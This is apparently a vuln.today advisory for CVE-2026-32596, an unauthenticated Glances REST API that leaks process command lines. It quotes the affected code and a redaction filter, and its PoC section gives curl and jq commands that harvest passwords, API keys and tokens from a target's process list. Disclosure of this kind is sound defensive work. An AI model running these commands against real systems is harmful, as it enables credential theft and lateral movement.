
CVE-2026-32596 (Python ecosystem)

Severity: HIGH, CVSS 3.1 base score 7.5 (GitHub Advisory)
Weakness: Information Exposure (CWE-200)
Published: 2026-03-16
Project: https://github.com/nicolargo/glances
Advisory: GHSA-wvxv-4j8q-4wjq

Severity by source

GitHub Advisory (primary): 7.5 HIGH, AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
SUSE: HIGH (qualitative)

Primary rating from GitHub Advisory.

CVSS Vector (GitHub Advisory)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Lifecycle Timeline

Analysis Generated: Mar 16, 2026 - 17:20 (vuln.today)
Patch released (patch available): Mar 16, 2026 - 17:20 (nvd)
CVE Published: Mar 16, 2026 - 16:23 (nvd)

Description (GitHub Advisory)

Summary

The Glances web server runs without authentication by default when started with `glances -w`, exposing its REST API, including sensitive system information such as process command lines that may contain credentials (passwords, API keys, tokens), to any network client.

Details

Root Cause: Authentication is optional and disabled by default. When no password is provided, the API router is initialized without an authentication dependency, and the server binds to 0.0.0.0, exposing all endpoints on every interface.

Affected Code:

  • File: glances/outputs/glances_restful_api.py, lines 259-272

```python
if self.args.password:
    self._password = GlancesPassword(username=args.username, config=config)
    if JWT_AVAILABLE:
        jwt_secret = config.get_value('outputs', 'jwt_secret_key', default=None)
        jwt_expire = config.get_int_value('outputs', 'jwt_expire_minutes', default=60)
        self._jwt_handler = JWTHandler(secret_key=jwt_secret, expire_minutes=jwt_expire)
        logger.info(f"JWT authentication enabled (token expiration: {jwt_expire} minutes)")
    else:
        self._jwt_handler = None
        logger.info("JWT authentication not available (python-jose not installed)")
else:
    # NO AUTHENTICATION BY DEFAULT
    self._password = None
    self._jwt_handler = None
```

  • File: glances/outputs/glances_restful_api.py, lines 477-480

```python
if self.args.password:
    router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)])
else:
    router = APIRouter(prefix=self.url_prefix)  # NO AUTH DEPENDENCY
```

  • File: glances/outputs/glances_restful_api.py, lines 98-99

```python
self.bind_address = args.bind_address or "0.0.0.0"  # BINDS TO ALL INTERFACES
self.port = args.port or 61208
```

  • File: glances/plugins/processlist/__init__.py, lines 127-140

```python
enable_stats = [
    'cpu_percent',
    'memory_percent',
    'memory_info',
    'pid',
    'username',
    'cpu_times',
    'num_threads',
    'nice',
    'status',
    'io_counters',
    'cpu_num',
    'cmdline',  # FULL COMMAND LINE EXPOSED, NO SANITIZATION
]
```
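The processlist plugin above serialises `cmdline` verbatim. As an added example that is not Glances code, the following filter masks secret-bearing option values in both `--opt=value` and `--opt value` form before a process entry is returned; the keyword pattern and the sample entries are constructed for this example and mirror the keywords the advisory's jq filter matches.

```python
import re
from typing import Dict, List

# Option-name keywords treated as secret carriers (assumption for this example;
# extend the list per deployment).
SECRET_OPTION = re.compile(r"(password|passwd|pass|api[-_]?key|token|secret)", re.IGNORECASE)

# Constructed sample modelled on the advisory's example entry; not captured from a real host.
SAMPLE_PROCESSLIST: List[Dict] = [
    {"pid": 4059, "username": "root", "name": "python3",
     "cmdline": ["python3", "-c", "import time; time.sleep(3600)",
                 "--api-key=sk-super-secret-token-12345",
                 "--password=MySecretPassword123",
                 "--db-pass", "admin123"]},
    {"pid": 1, "username": "root", "name": "systemd", "cmdline": ["/sbin/init"]},
]


def is_secret_option(token: str) -> bool:
    """True for option names such as --password, --db-pass or --api-key."""
    return token.startswith("-") and SECRET_OPTION.search(token) is not None


def redact_cmdline(argv: List[str], mask: str = "***") -> List[str]:
    """Mask secret values given as '--opt=value' or as '--opt value'."""
    redacted: List[str] = []
    expect_value = False
    for arg in argv:
        if expect_value:
            expect_value = False
            # A following option means the secret flag carried no separate value.
            if not arg.startswith("-"):
                redacted.append(mask)
                continue
        name, sep, _value = arg.partition("=")
        if sep and is_secret_option(name):
            redacted.append(f"{name}={mask}")
        elif not sep and is_secret_option(arg):
            redacted.append(arg)
            expect_value = True
        else:
            redacted.append(arg)
    return redacted


def sanitize_processlist(entries: List[Dict]) -> List[Dict]:
    """Return copies of the entries with cmdline redacted; inputs are not mutated."""
    return [{**e, "cmdline": redact_cmdline(e.get("cmdline", []))} for e in entries]
```

Values embedded in positional arguments (for example a connection URL) are not covered by this option-based filter and need a separate rule.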

PoC

  1. Start Glances in default web server mode:

```bash
glances -w
# Output: Glances Web User Interface started on http://0.0.0.0:61208/
```

  2. Access the API without authentication from any network client:

```bash
curl -s http://TARGET:61208/api/4/system | jq .
```

  3. Extract system information:

```bash
curl -s http://TARGET:61208/api/4/all > system_dump.json
```

  4. Harvest credentials from the process list:

```bash
curl -s http://TARGET:61208/api/4/processlist | \
  jq -r '.[] | select(.cmdline | tostring | test("password|api-key|token|secret"; "i")) |
  {pid, username, process: .name, cmdline}'
```

  5. Example credential exposure:

```json
{
  "pid": 4059,
  "username": "root",
  "process": "python3",
  "cmdline": [
    "python3",
    "-c",
    "import time; time.sleep(3600)",
    "--api-key=sk-super-secret-token-12345",
    "--password=MySecretPassword123",
    "--db-pass=admin123"
  ]
}
```

Impact

Complete system reconnaissance and credential harvesting from any network client. Exposed endpoints include system info, process lists with full command-line arguments (containing passwords/API keys/tokens), network connections, filesystems, and Docker containers. Enables lateral movement and targeted attacks using stolen credentials.

Analysis (AI)

Glances web server exposes its REST API without authentication by default when started with the -w flag, allowing unauthenticated remote attackers to access sensitive system information including process details that may contain credentials such as passwords and API keys. The vulnerability affects Python and Docker deployments where Glances is exposed to untrusted networks due to the server binding to 0.0.0.0 with authentication disabled by default. …


Attack Chain (AI derived)

Hypothetical attack flow derived from CVE metadata:

  • Access: Start Glances with web flag
  • Exploit: Connect to unauthenticated REST API
  • Execution: Retrieve system process information
  • Impact: Extract credentials from command-lines

Vulnerability Assessment (AI)

Exploitation: Glances web server started with the `glances -w` flag without a password argument, on the default configuration binding to 0.0.0.0. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment: Exposed information (credentials, internal paths, user data, configuration) can be leveraged for further attacks or regulatory violations. Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario: An attacker triggers error conditions or accesses improperly protected endpoints to extract sensitive internal information from the application.
Remediation: A vendor patch is available — apply it immediately. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended Action (AI)

Within 24 hours: Identify all systems running Glances in web mode (-w flag) using network scanning or asset inventory tools, and immediately isolate them or restrict network access. …



Vendor Status

SUSE
Severity: High
Product status: openSUSE Tumbleweed: Fixed


CVE-2026-32596 vulnerability details – vuln.today
